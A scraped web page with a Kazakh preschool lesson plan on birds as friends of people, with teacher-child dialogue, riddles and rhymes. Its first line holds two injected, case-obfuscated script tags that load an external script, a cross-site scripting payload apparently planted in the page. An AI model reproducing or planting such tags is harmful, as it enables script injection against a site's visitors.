<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.03.2018

 

    Қоршаған ортамен

таныстыру.

Тақырыбы:  Құстар- біздің досымыз

  Мақсаты:

Білімділік:

Балаларға құстар туралы, оның адамға пайдасы туралы түсінік беру. Құстардың

сыртқы түрі және немен қоректенетінін айтып түсіндіру.

Дамытушылық: Қыс

кезінде құстарға қамқорлық жасауға деген белсенділігін арттыру, тіл-байлығын,

ой-өрісін, сөздік қорын дамыту.

Тәрбиелік:

Балаларды еңбексүйгіштікке, құстарға қамқорлық жасай білуге тәрбиелеу.

Әдістері:  түсіндіру, сұрақ-жауап, әңгімелеу.

Көрнекілігі:

Құстардың суреті,үнтаспадан құстар дауысы,мақал- мәтел

Сөздік жұмыс:

Оқу іс-әрекеті.

Тәрбиешінің

іс-әрекеті.

Баланың іс әрекеті.

Ұйымдастыру:

-Балалар көңіл

күйлерің қалай?

-Жақсы.

Балалар, барлығымыз

ортаға шығып, шаттық шеңбер бойында бір-бірімізбен сәлемдесейік.

Армысың қасиетті-

Аспан ата!

Армысың қасиетті-

Жер ана!

Армысыздар апайлар,

Армысың менің

достарым.

Аспанымыз ашық

болсын,

Деніміз сау болсын,

Күніміз сәтті

болсын.

-Балалар шаттық

шеңбер бойына жиналып, бір-біріміздің қолымызды ұстағанда нені сезіндік.

-Достықты,

жылулықты, бәріміз бірге екенімізді сезіндік.

-Өте жақсы балалар.

Орындарыңа отырыңдар.

(Құстардың дыбысы

бар ән орындалады.)

-Балалар бұл ненің

дыбысы екен?

-Құстың дауысы.

Олардың  дыбыстары бірдей бола ма?

(Балалармен бірге

бірнеше құс дыбысын айту).

Қарға қалай

дыбыстайды?

Қарр-қарр-қарр.

Торғай ше?

Шиық-шиық.

Көкек ше?

Ку-кук, ку-кук.

-Мінекей

қараңдаршы,  әр құстың өз дыбысы бар.

-Балалар айтыңдаршы

жыл мезгілінде ,неше жыл мезгілі бар?

-Атап өтейікші

-Балалар жауабы:

Қыс, Көктем,Жаз,Күз

Балалар біз

серуенде жүргенде, көп құстардың ұшып жүргенін көреміз бе?

-Жоқ  құстар аз.

Өйткені құстар жылы

жаққа ұшып кеткен. Көктемде күн жылына бастайды, сонда құстар өздерінің туған

жерлеріне ұшып келеді.

-Қыстайтын құстарды

атап, көрсетіп берейікші.

-қарға, сауысқан,

торғай.

-Балалар көктем

құстарына қандай құстар жатады?

-қарлығаш,

көгершін, көкек.

   Ал енді үй құстарын кім атап береді?

Қаз, тауық,

балапан, әтеш, үйрек.

-Неге үй құстары

деп аталады?

-Себебі олар үйде

өседі.

-Олардың қандай

пайдасы бар?

-Еті, жұмыртқасы,

мамық жүні.

Барлық құстар

жұмыртқа салады, жұмыртқадан балапан өседі.

-Құстар қалай

ұйықтайды?

-Қанаттарын

түсіріп, көздерін жұмып, басын қанатының астына тығып ұйықтайды.

-Дала құстарын кім

айтады? (тырна, қарлығаш, қараторғай,

көкек).

Бұл құстар нені

қорғайды?

-Бұл құстар

ағаштарды қорғайды.

-Балалар неге

құстарды біздің досымыз дейміз?

-Өйткені құстар

орман емшісі. Олар ағаштардағы құрт-құмырсқаны, зиянды жәндіктерді  жейді.

Ағаштар бізге таза

ауа шығарады. Сондықтанда біз құстарды досымыз дейміз.  

Сергіту сәті:

«Шеп-шеп» әні

 Осы құстар несімен бір-біріне ұқсайды?

(денесі сопақша, басы дөңгелек, құйрығы ұзын, тұмсығы

үшбұрыш, қанаты жартылай сопақша, екі аяқты)

  Тақтаға қарайықшы бұл қандай құс?

-Торғай.

- Дұрыс айтасыңдар.

Қазір біз сендермен осы торғайды құрастырамыз.

Бізге торғайдың

дене мүшелері бөлініп берілген. Сол бөлінген дене мүшелерін құрастырып торғай

жасаймыз.

-Қараңдаршы неше

бөлік?

(5 бөлікке бөлінген

құс)

-Бес бөлікпен

берілген. Бөліктерін санату. 1-басы, 2-кеудесі, 3- қанаты, 4- құйрығы, 5-аяғы.

 (Балалар өз орындарында құрастырады)

-Айтыңдаршы көзі

нешеу? Қанаты ше?

(құрастырып болған торғай

        Сергіту сәті:

«Шеп-шеп» әні

             Тосын

сый жұмыртқаның тапсырмалары:

          Жұмбақтар:

1.    

Еркін

самғап ұшсын деп,

Мәпелейміз

баптаймыз.

Бейбітшілік

құсы деп,

Қайсы

құсты мақтаймыз?

                                       

(Көгершін)

     Шарлап келіп даланы,

Үйіме

үйін салады.

                     (қарлығаш)

 

2.Құстар

туралы тақпақтар, тиым сөздер:

 

Нан

қоқымын шашпаңдар,

Жерде

жатса баспаңдар,

Теріп

алып қастерлеп,

Торғайларға

тастаңдар.

 

Кіп-

кішкентай торғайды,

Қорғамаса

болмайды.

Кіп-кішкентай

торғайлар,

Ағаштарды

қорғайды.

3.Логилалық сұрақ:

Адамда қол,ал құста не?

(қанат)

Қыс мезгілінде

барлық дала құстары жылы жаққа ұшып кетпейді екен. Қыста суыққа төзе алатын

құстар ғана қыстап қалады. Оларды қыстайтын құстар деп атайды.

Ойын: «Ұшты-ұшты»

    

 

  Күтілетін нәтиже: 

Бала білуі

керек:  Құстарға  қамқор жасау, құстарды ажырата білу.

                              Құстардың адамға қажет екенін ұғындыру.

 

 

 

 

 

 

 

 

 

 

 

 

                                               

                                                   

  Ақмола облысы

                                                      Зеренді ауданы

                                                     Ақкөл орта мектебі КММ

 

 

 

 

 

      

 

                          «Құстар - біздің досымыз»

                                  Қоршаған

ортамен таныстыру

                   

 

 

 

 

                                     Мектепалды даярлық сынып мұғалімі:

                                                                                                  

Мухаметжанова А.Н

 

                                                                  

(2018-жыл)

Просмотров: 813

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу